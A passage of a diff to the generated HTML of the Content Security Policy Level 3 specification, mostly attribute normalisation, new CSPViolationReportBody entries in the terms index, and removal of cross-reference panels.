-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#img-src" id="ref-for-img-src④"><code>img-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-img-src">§6.1.6 img-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#manifest-src" id="ref-for-manifest-src③"><code>manifest-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#manifest-src" id="ref-for-manifest-src③"><code>manifest-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-manifest-src">§6.1.7 manifest-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#media-src" id="ref-for-media-src③"><code>media-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#media-src" id="ref-for-media-src③"><code>media-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-media-src">§6.1.8 media-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#object-src" id="ref-for-object-src④"><code>object-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#object-src" id="ref-for-object-src④"><code>object-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-object-src">§6.1.9 object-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#plugin-types" id="ref-for-plugin-types②"><code>plugin-types</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#plugin-types" id="ref-for-plugin-types②"><code>plugin-types</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-plugin-types">§6.2.2 plugin-types</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#report-uri" id="ref-for-report-uri④"><code>report-uri</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#report-uri" id="ref-for-report-uri④"><code>report-uri</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-report-uri">§6.4.1 report-uri</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#report-to" id="ref-for-report-to⑤"><code>report-to</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#report-to" id="ref-for-report-to⑤"><code>report-to</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-report-to">§6.4.2 report-to</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#sandbox" id="ref-for-sandbox①"><code>sandbox</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#sandbox" id="ref-for-sandbox①"><code>sandbox</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-sandbox">§6.2.3 sandbox</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#script-src" id="ref-for-script-src⑤"><code>script-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#script-src" id="ref-for-script-src⑤"><code>script-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-script-src">§6.1.11 script-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#script-src-attr" id="ref-for-script-src-attr⑤"><code>script-src-attr</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#script-src-attr" id="ref-for-script-src-attr⑤"><code>script-src-attr</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-script-src-attr">§6.1.13 script-src-attr</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#script-src-elem" id="ref-for-script-src-elem⑤"><code>script-src-elem</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#script-src-elem" id="ref-for-script-src-elem⑤"><code>script-src-elem</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-script-src-elem">§6.1.12 script-src-elem</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#style-src" id="ref-for-style-src①"><code>style-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#style-src" id="ref-for-style-src①"><code>style-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-style-src">§6.1.14 style-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#style-src-attr" id="ref-for-style-src-attr②"><code>style-src-attr</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#style-src-attr" id="ref-for-style-src-attr②"><code>style-src-attr</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-style-src-attr">§6.1.16 style-src-attr</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#style-src-elem" id="ref-for-style-src-elem②"><code>style-src-elem</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#style-src-elem" id="ref-for-style-src-elem②"><code>style-src-elem</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-style-src-elem">§6.1.15 style-src-elem</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#worker-src" id="ref-for-worker-src④"><code>worker-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#worker-src" id="ref-for-worker-src④"><code>worker-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-worker-src">§6.1.17 worker-src</a>)</p>
     </dl>
     <h3 class="heading settled" data-level="10.2" id="iana-headers"><span class="secno">10.2. </span><span class="content"> Headers </span><a class="self-link" href="#iana-headers"></a></h3>
@@ -5766,9 +5774,9 @@ document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ip
     <h2 class="heading settled" data-level="11" id="acknowledgements"><span class="secno">11. </span><span class="content">Acknowledgements</span><a class="self-link" href="#acknowledgements"></a></h2>
     <p>Lots of people are awesome. For instance:</p>
     <ul>
-     <li data-md>
+     <li data-md="">
       <p>Mario and all of Cure53.</p>
-     <li data-md>
+     <li data-md="">
       <p>Artur Janc, Michele Spagnuolo, Lukas Weichselbaum, Jochen Eisinger, and the
 rest of Google’s CSP Cabal.</p>
     </ul>
@@ -5788,8 +5796,8 @@ rest of Google’s CSP Cabal.</p>
   <p>Examples in this specification are introduced with the words “for example”
     or are set apart from the normative text with <code>class="example"</code>,
     like this: </p>
-  <div class="example" id="example-ae2b6bc0">
-   <a class="self-link" href="#example-ae2b6bc0"></a> 
+  <div class="example" id="example-f839f6c8">
+   <a class="self-link" href="#example-f839f6c8"></a> 
    <p>This is an example of an informative example.</p>
   </div>
   <p>Informative notes begin with the word “Note” and are set apart from the
@@ -5819,6 +5827,7 @@ rest of Google’s CSP Cabal.</p>
    <li>
     blockedURL
     <ul>
+     <li><a href="#dom-cspviolationreportbody-blockedurl">attribute for CSPViolationReportBody</a><span>, in §5</span>
      <li><a href="#dom-securitypolicyviolationevent-blockedurl">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-blockedurl">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
@@ -5830,7 +5839,12 @@ rest of Google’s CSP Cabal.</p>
      <li><a href="#dom-securitypolicyviolationeventinit-colno">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
    <li><a href="#violation-column-number">column number</a><span>, in §2.4</span>
-   <li><a href="#dom-securitypolicyviolationevent-columnnumber">columnNumber</a><span>, in §5.1</span>
+   <li>
+    columnNumber
+    <ul>
+     <li><a href="#dom-cspviolationreportbody-columnnumber">attribute for CSPViolationReportBody</a><span>, in §5</span>
+     <li><a href="#dom-securitypolicyviolationevent-columnnumber">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
+    </ul>
    <li><a href="#connect-src">connect-src</a><span>, in §6.1.2</span>
    <li><a href="#contains-a-header-delivered-content-security-policy">contains a header-delivered Content Security Policy</a><span>, in §2.2</span>
    <li><a href="#header-content-security-policy">Content-Security-Policy</a><span>, in §3.1</span>
@@ -5843,6 +5857,8 @@ rest of Google’s CSP Cabal.</p>
      <li><a href="#csp-list">definition of</a><span>, in §2.2</span>
      <li><a href="#global-object-csp-list">dfn for global object</a><span>, in §4.2</span>
     </ul>
+   <li><a href="#csp-violation-report">csp violation report</a><span>, in §5</span>
+   <li><a href="#cspviolationreportbody">CSPViolationReportBody</a><span>, in §5</span>
    <li><a href="#default-src">default-src</a><span>, in §6.1.3</span>
    <li><a href="#grammardef-directive-name">directive-name</a><span>, in §2.3</span>
    <li><a href="#directives">directives</a><span>, in §2.3</span>
@@ -5851,32 +5867,36 @@ rest of Google’s CSP Cabal.</p>
    <li>
     disposition
     <ul>
-     <li><a href="#dom-securitypolicyviolationevent-disposition">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#policy-disposition">dfn for policy</a><span>, in §2.2</span>
      <li><a href="#violation-disposition">dfn for violation</a><span>, in §2.4</span>
+     <li><a href="#dom-cspviolationreportbody-disposition">attribute for CSPViolationReportBody</a><span>, in §5</span>
+     <li><a href="#dom-securitypolicyviolationevent-disposition">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-disposition">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
    <li><a href="#dom-securitypolicyviolationevent-documenturi">documentURI</a><span>, in §5.1</span>
    <li>
     documentURL
     <ul>
+     <li><a href="#dom-cspviolationreportbody-documenturl">attribute for CSPViolationReportBody</a><span>, in §5</span>
      <li><a href="#dom-securitypolicyviolationevent-documenturl">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-documenturl">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
    <li>
+    effective directive
+    <ul>
+     <li><a href="#violation-effective-directive">dfn for violation</a><span>, in §2.4</span>
+     <li><a href="#request-effective-directive">dfn for request</a><span>, in §6.7.1</span>
+    </ul>
+   <li>
     effectiveDirective
     <ul>
+     <li><a href="#dom-cspviolationreportbody-effectivedirective">attribute for CSPViolationReportBody</a><span>, in §5</span>
      <li><a href="#dom-securitypolicyviolationevent-effectivedirective">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-effectivedirective">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
-   <li>
-    effective directive
-    <ul>
-     <li><a href="#request-effective-directive">dfn for request</a><span>, in §6.7.1</span>
-     <li><a href="#violation-effective-directive">dfn for violation</a><span>, in §2.4</span>
-    </ul>
    <li><a href="#violation-element">element</a><span>, in §2.4</span>
    <li><a href="#embedding-document">embedding document</a><span>, in §4.2</span>
+   <li><a href="#dom-securitypolicyviolationeventdisposition-enforce">enforce</a><span>, in §5.1</span>
    <li><a href="#dom-securitypolicyviolationeventdisposition-enforce">"enforce"</a><span>, in §5.1</span>
    <li><a href="#enforced">enforced</a><span>, in §4.2</span>
    <li><a href="#can-compile-strings">EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source)</a><span>, in §4.3</span>
@@ -5903,7 +5923,12 @@ rest of Google’s CSP Cabal.</p>
      <li><a href="#dom-securitypolicyviolationeventinit-lineno">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
    <li><a href="#violation-line-number">line number</a><span>, in §2.4</span>
-   <li><a href="#dom-securitypolicyviolationevent-linenumber">lineNumber</a><span>, in §5.1</span>
+   <li>
+    lineNumber
+    <ul>
+     <li><a href="#dom-cspviolationreportbody-linenumber">attribute for CSPViolationReportBody</a><span>, in §5</span>
+     <li><a href="#dom-securitypolicyviolationevent-linenumber">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
+    </ul>
    <li><a href="#manifest-src">manifest-src</a><span>, in §6.1.7</span>
    <li><a href="#media-src">media-src</a><span>, in §6.1.8</span>
    <li><a href="#grammardef-media-type">media-type</a><span>, in §6.2.2</span>
@@ -5919,6 +5944,7 @@ rest of Google’s CSP Cabal.</p>
    <li>
     originalPolicy
     <ul>
+     <li><a href="#dom-cspviolationreportbody-originalpolicy">attribute for CSPViolationReportBody</a><span>, in §5</span>
      <li><a href="#dom-securitypolicyviolationevent-originalpolicy">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-originalpolicy">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
@@ -5943,11 +5969,13 @@ rest of Google’s CSP Cabal.</p>
    <li>
     referrer
     <ul>
-     <li><a href="#dom-securitypolicyviolationevent-referrer">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#violation-referrer">dfn for violation</a><span>, in §2.4</span>
+     <li><a href="#dom-cspviolationreportbody-referrer">attribute for CSPViolationReportBody</a><span>, in §5</span>
+     <li><a href="#dom-securitypolicyviolationevent-referrer">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-referrer">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
    <li><a href="#dom-securitypolicyviolationeventdisposition-report">"report"</a><span>, in §5.1</span>
+   <li><a href="#dom-securitypolicyviolationeventdisposition-report">report</a><span>, in §5.1</span>
    <li><a href="#grammardef-report-sample">'report-sample'</a><span>, in §2.3.1</span>
    <li><a href="#report-to">report-to</a><span>, in §6.4.2</span>
    <li><a href="#report-uri">report-uri</a><span>, in §6.4.1</span>
@@ -5957,8 +5985,9 @@ rest of Google’s CSP Cabal.</p>
    <li>
     sample
     <ul>
-     <li><a href="#dom-securitypolicyviolationevent-sample">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#violation-sample">dfn for violation</a><span>, in §2.4</span>
+     <li><a href="#dom-cspviolationreportbody-sample">attribute for CSPViolationReportBody</a><span>, in §5</span>
+     <li><a href="#dom-securitypolicyviolationevent-sample">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-sample">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
    <li><a href="#sandbox">sandbox</a><span>, in §6.2.3</span>
@@ -5991,6 +6020,7 @@ rest of Google’s CSP Cabal.</p>
    <li>
     sourceFile
     <ul>
+     <li><a href="#dom-cspviolationreportbody-sourcefile">attribute for CSPViolationReportBody</a><span>, in §5</span>
      <li><a href="#dom-securitypolicyviolationevent-sourcefile">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-sourcefile">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
@@ -5999,6 +6029,7 @@ rest of Google’s CSP Cabal.</p>
    <li>
     statusCode
     <ul>
+     <li><a href="#dom-cspviolationreportbody-statuscode">attribute for CSPViolationReportBody</a><span>, in §5</span>
      <li><a href="#dom-securitypolicyviolationevent-statuscode">attribute for SecurityPolicyViolationEvent</a><span>, in §5.1</span>
      <li><a href="#dom-securitypolicyviolationeventinit-statuscode">dict-member for SecurityPolicyViolationEventInit</a><span>, in §5.1</span>
     </ul>
@@ -6014,2099 +6045,306 @@ rest of Google’s CSP Cabal.</p>
    <li><a href="#directive-value">value</a><span>, in §2.3</span>
    <li><a href="#dom-securitypolicyviolationevent-violateddirective">violatedDirective</a><span>, in §5.1</span>
    <li><a href="#violation">violation</a><span>, in §2.4</span>
-   <li><a href="#violation-report">violation report</a><span>, in §5</span>
    <li><a href="#worker-src">worker-src</a><span>, in §6.1.17</span>
   </ul>
-  <aside class="dfn-panel" data-for="term-for-at-ruledef-import">
-   <a href="https://drafts.csswg.org/css-cascade-4/#at-ruledef-import">https://drafts.csswg.org/css-cascade-4/#at-ruledef-import</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-at-ruledef-import">6.1.14. style-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-insert-a-css-rule">
-   <a href="https://drafts.csswg.org/cssom-1/#insert-a-css-rule">https://drafts.csswg.org/cssom-1/#insert-a-css-rule</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-insert-a-css-rule">6.1.14. style-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-parse-a-css-declaration-block">
-   <a href="https://drafts.csswg.org/cssom-1/#parse-a-css-declaration-block">https://drafts.csswg.org/cssom-1/#parse-a-css-declaration-block</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-parse-a-css-declaration-block">6.1.14. style-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-parse-a-css-rule">
-   <a href="https://drafts.csswg.org/cssom-1/#parse-a-css-rule">https://drafts.csswg.org/cssom-1/#parse-a-css-rule</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-parse-a-css-rule">6.1.14. style-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-parse-a-group-of-selectors">
-   <a href="https://drafts.csswg.org/cssom-1/#parse-a-group-of-selectors">https://drafts.csswg.org/cssom-1/#parse-a-group-of-selectors</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-parse-a-group-of-selectors">6.1.14. style-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-document">
-   <a href="https://dom.spec.whatwg.org/#document">https://dom.spec.whatwg.org/#document</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-document">1.2. Goals</a>
-    <li><a href="#ref-for-document①">2.2. Policies</a>
-    <li><a href="#ref-for-document②">2.3. Directives</a>
-    <li><a href="#ref-for-document③">3.3. 
-    The &lt;meta> element </a>
-    <li><a href="#ref-for-document④">4.2. 
-    Integration with HTML </a> <a href="#ref-for-document⑤">(2)</a> <a href="#ref-for-document⑥">(3)</a> <a href="#ref-for-document⑦">(4)</a> <a href="#ref-for-document⑧">(5)</a>
-    <li><a href="#ref-for-document⑨">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-document①⓪">4.2.3. 
-    Retrieve the CSP list of an object </a>
-    <li><a href="#ref-for-document①①">4.2.4. 
-    Should element’s inline type behavior be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-document①②">5.3. 
-    Report a violation </a>
-    <li><a href="#ref-for-document①③">6.1.14. style-src</a>
-    <li><a href="#ref-for-document①④">6.2.1. base-uri</a>
-    <li><a href="#ref-for-document①⑤">6.2.1.1. 
-    Is base allowed for document? </a>
-    <li><a href="#ref-for-document①⑥">6.2.3.2. 
-    sandbox Initialization </a> <a href="#ref-for-document①⑦">(2)</a> <a href="#ref-for-document①⑧">(3)</a>
-    <li><a href="#ref-for-document①⑨">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-    <li><a href="#ref-for-document②⓪">7.8. 
-    CSP Inheriting to avoid bypasses </a> <a href="#ref-for-document②①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-element">
-   <a href="https://dom.spec.whatwg.org/#element">https://dom.spec.whatwg.org/#element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-element">2.3. Directives</a>
-    <li><a href="#ref-for-element①">4.2.4. 
-    Should element’s inline type behavior be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-element②">6.1.3.3. 
-    default-src Inline Check </a>
-    <li><a href="#ref-for-element③">6.1.11.3. 
-    script-src Inline Check </a>
-    <li><a href="#ref-for-element④">6.1.12.3. 
-    script-src-elem Inline Check </a>
-    <li><a href="#ref-for-element⑤">6.1.13.1. 
-    script-src-attr Inline Check </a>
-    <li><a href="#ref-for-element⑥">6.1.14.3. 
-    style-src Inline Check </a>
-    <li><a href="#ref-for-element⑦">6.1.15.3. 
-    style-src-elem Inline Check </a>
-    <li><a href="#ref-for-element⑧">6.1.16.1. 
-    style-src-attr Inline Check </a>
-    <li><a href="#ref-for-element⑨">6.2.2.2. 
-    Should plugin element be blocked a priori by Content
-    Security Policy?: </a>
-    <li><a href="#ref-for-element①⓪">6.6.3.1. 
-    Is element nonceable? </a>
-    <li><a href="#ref-for-element①①">6.6.3.3. 
-    Does element match source list for type and source? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-event">
-   <a href="https://dom.spec.whatwg.org/#event">https://dom.spec.whatwg.org/#event</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-event">5.1. 
-    Violation DOM Events </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dictdef-eventinit">
-   <a href="https://dom.spec.whatwg.org/#dictdef-eventinit">https://dom.spec.whatwg.org/#dictdef-eventinit</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dictdef-eventinit">5.1. 
-    Violation DOM Events </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-event-bubbles">
-   <a href="https://dom.spec.whatwg.org/#dom-event-bubbles">https://dom.spec.whatwg.org/#dom-event-bubbles</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-event-bubbles">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-event-composed">
-   <a href="https://dom.spec.whatwg.org/#dom-event-composed">https://dom.spec.whatwg.org/#dom-event-composed</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-event-composed">5.3. 
-    Report a violation </a> <a href="#ref-for-dom-event-composed①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-connected">
-   <a href="https://dom.spec.whatwg.org/#connected">https://dom.spec.whatwg.org/#connected</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-connected">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-document">
-   <a href="https://dom.spec.whatwg.org/#concept-document">https://dom.spec.whatwg.org/#concept-document</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-document">6.3.3. navigate-to</a> <a href="#ref-for-concept-document①">(2)</a> <a href="#ref-for-concept-document②">(3)</a> <a href="#ref-for-concept-document③">(4)</a> <a href="#ref-for-concept-document④">(5)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-event-fire">
-   <a href="https://dom.spec.whatwg.org/#concept-event-fire">https://dom.spec.whatwg.org/#concept-event-fire</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-event-fire">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-node-document">
-   <a href="https://dom.spec.whatwg.org/#concept-node-document">https://dom.spec.whatwg.org/#concept-node-document</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-node-document">6.2.2.2. 
-    Should plugin element be blocked a priori by Content
-    Security Policy?: </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-document-origin">
-   <a href="https://dom.spec.whatwg.org/#dom-document-origin">https://dom.spec.whatwg.org/#dom-document-origin</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-document-origin">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-shadow-including-root">
-   <a href="https://dom.spec.whatwg.org/#concept-shadow-including-root">https://dom.spec.whatwg.org/#concept-shadow-including-root</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-shadow-including-root">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-event-target">
-   <a href="https://dom.spec.whatwg.org/#dom-event-target">https://dom.spec.whatwg.org/#dom-event-target</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-event-target">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sec-function-objects">
-   <a href="https://tc39.github.io/ecma262#sec-function-objects">https://tc39.github.io/ecma262#sec-function-objects</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sec-function-objects">6.1.11. script-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sec-hostensurecancompilestrings">
-   <a href="https://tc39.github.io/ecma262#sec-hostensurecancompilestrings">https://tc39.github.io/ecma262#sec-hostensurecancompilestrings</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sec-hostensurecancompilestrings">4.3. Integration with ECMAScript</a>
-    <li><a href="#ref-for-sec-hostensurecancompilestrings①">4.3.1. 
-    EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source) </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sec-json.stringify">
-   <a href="https://tc39.github.io/ecma262#sec-json.stringify">https://tc39.github.io/ecma262#sec-json.stringify</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sec-json.stringify">5.2. 
-    Obtain the deprecated serialization of violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sec-eval-x">
-   <a href="https://tc39.github.io/ecma262#sec-eval-x">https://tc39.github.io/ecma262#sec-eval-x</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sec-eval-x">1.2. Goals</a>
-    <li><a href="#ref-for-sec-eval-x①">6.1.11. script-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-realm">
-   <a href="https://tc39.github.io/ecma262#realm">https://tc39.github.io/ecma262#realm</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-realm">4.3.1. 
-    EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source) </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-utf-8-encode">
-   <a href="https://encoding.spec.whatwg.org/#utf-8-encode">https://encoding.spec.whatwg.org/#utf-8-encode</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-utf-8-encode">6.6.3.3. 
-    Does element match source list for type and source? </a>
-    <li><a href="#ref-for-utf-8-encode①">8.4. 
-      Allowing external JavaScript via hashes </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-body">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-body">https://fetch.spec.whatwg.org/#concept-request-body</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-body">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-client">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-client">https://fetch.spec.whatwg.org/#concept-request-client</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-client">2.4.2. 
-    Create a violation object for request, and policy. </a>
-    <li><a href="#ref-for-concept-request-client①">4.1.2. 
-    Report Content Security Policy violations for request </a> <a href="#ref-for-concept-request-client②">(2)</a>
-    <li><a href="#ref-for-concept-request-client③">4.1.3. 
-    Should request be blocked by Content Security Policy? </a> <a href="#ref-for-concept-request-client④">(2)</a>
-    <li><a href="#ref-for-concept-request-client⑤">4.1.4. 
-    Should response to request be blocked by Content Security Policy? </a> <a href="#ref-for-concept-request-client⑥">(2)</a>
-    <li><a href="#ref-for-concept-request-client⑦">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-concept-request-client⑧">4.2.5. 
-    Should navigation request of type from source in target be blocked
-    by Content Security Policy? </a> <a href="#ref-for-concept-request-client⑨">(2)</a> <a href="#ref-for-concept-request-client①⓪">(3)</a> <a href="#ref-for-concept-request-client①①">(4)</a>
-    <li><a href="#ref-for-concept-request-client①②">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a> <a href="#ref-for-concept-request-client①③">(2)</a>
-    <li><a href="#ref-for-concept-request-client①④">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-credentials-mode">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-credentials-mode">https://fetch.spec.whatwg.org/#concept-request-credentials-mode</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-credentials-mode">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-nonce-metadata">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata">https://fetch.spec.whatwg.org/#concept-request-nonce-metadata</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-nonce-metadata">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata①">6.1.14.1. 
-    style-src Pre-request Check </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata②">6.1.14.2. 
-    style-src Post-request Check </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata③">6.1.15.1. 
-    style-src-elem Pre-request Check </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata④">6.1.15.2. 
-    style-src-elem Post-request Check </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata⑤">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata⑥">6.6.1.2. 
-    Script directives post-request check </a>
-    <li><a href="#ref-for-concept-request-nonce-metadata⑦">6.6.2.2. 
-    Does nonce match source list? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-response-csp-list">
-   <a href="https://fetch.spec.whatwg.org/#concept-response-csp-list">https://fetch.spec.whatwg.org/#concept-response-csp-list</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-response-csp-list">4.1. 
